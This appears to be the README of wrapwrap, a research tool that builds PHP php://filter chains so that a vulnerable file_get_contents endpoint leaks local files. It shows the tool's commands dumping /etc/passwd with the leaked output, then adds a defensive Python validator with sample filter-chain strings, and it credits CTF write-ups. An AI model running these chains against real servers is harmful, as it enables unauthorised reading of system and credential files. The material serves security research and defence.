Generates a php://filter chain that adds a prefix and a suffix to the contents of a file.
Refer to our blogpost for details about the implementation.
If you want to contribute, the main Python file contains a few TODOs which should not be hard to implement.
Say you have code like so:
$data = file_get_contents($_POST['url']);
$data = json_decode($data);
echo $data->message;
To obtain the contents of some file, we'd like to have: {"message":"<file contents>"}. This can be done using:
$ ./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000
[*] Dumping 1008 bytes from /etc/passwd.
[+] Wrote filter chain to chain.txt (size=705031).
This yields:
{"message":"root:x:0:0:root:/root:/bin/bash=0Adaemon:..."}
If some PHP code parses arbitrary XML and displays the contents of the <name> tag, we'd like something like: <root><name>[file contents]</name></root>. As a result, we'd use:
$ ./wrapwrap.py /etc/passwd '<root><name>' '</name></root>' 1000
[*] Dumping 1008 bytes from /etc/passwd.
[+] Wrote filter chain to chain.txt (size=709871).
This produces:
<root><name>root:x:0:0:root:/root:/bin/bash=0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin=0Abin:x:...</name></root>
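On the defending side, the value passed to file_get_contents() in the snippet above is the thing to check. The following is an added example, not part of wrapwrap: a Python review of a submitted `url` value that enforces a scheme allowlist and flags php://filter chains. The function names, the http/https allowlist, the 2048-character limit and the sample values are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the endpoint only needs web URLs
MAX_LEN = 2048  # assumption: legitimate URLs are short; the chains above are ~700 KB
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so single and double encoding are both seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def count_filters(url):
    """Approximate number of filters named in a php://filter URL."""
    chain = url.split("://", 1)[1].lower().partition("/resource=")[0]
    parts = [p for p in re.split(r"[|/]", chain)[1:] if p]  # [0] is "filter"
    return len(parts)


def review_url(value):
    """Return a list of findings; an empty list means the value may be fetched."""
    findings = []
    url = decode_fully(value).strip()
    match = SCHEME_RE.match(url)
    scheme = match.group(1).lower() if match else "none"
    if scheme not in ALLOWED_SCHEMES:
        findings.append(f"scheme '{scheme}' is not in the allowlist")
    if url.lower().startswith("php://filter"):
        findings.append(f"php://filter chain naming {count_filters(url)} filters")
    if len(value) > MAX_LEN:
        findings.append(f"value is {len(value)} characters long")
    return findings


# Constructed samples, not captured traffic.
BENIGN = "https://example.com/data.json"
SHORT = "php://filter/read=convert.base64-encode|convert.iconv.UTF8.UTF16/resource=/etc/passwd"
ENCODED = "php%253A%252F%252Ffilter%252Fresource%253D%252Fetc%252Fpasswd"
LONG = "php://filter/read=" + "|".join(["convert.iconv.UTF8.UTF16"] * 200) + "/resource=/etc/passwd"

if __name__ == "__main__":
    for sample in (BENIGN, SHORT, ENCODED, LONG):
        print(sample[:60], "->", review_url(sample) or "accept")
```

The allowlist is the control; the filter count and length findings are there to make the rejected request easy to triage in logs.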
As mentioned in the blogpost, this tool could not have been made without the previous work of other people such as (but not limited to):
- Surprising CTF task solution using php://filter by gynvael
- Solving "includer's revenge" from hxp ctf 2021 without controlling any files by loknop
- PHP filters chain: what is it and how to use it by remsio
- DownUnderCTF 2022 minimal-php solution and write up by hash_kitten
- PHP filters chain: file read from error based oracle by remsio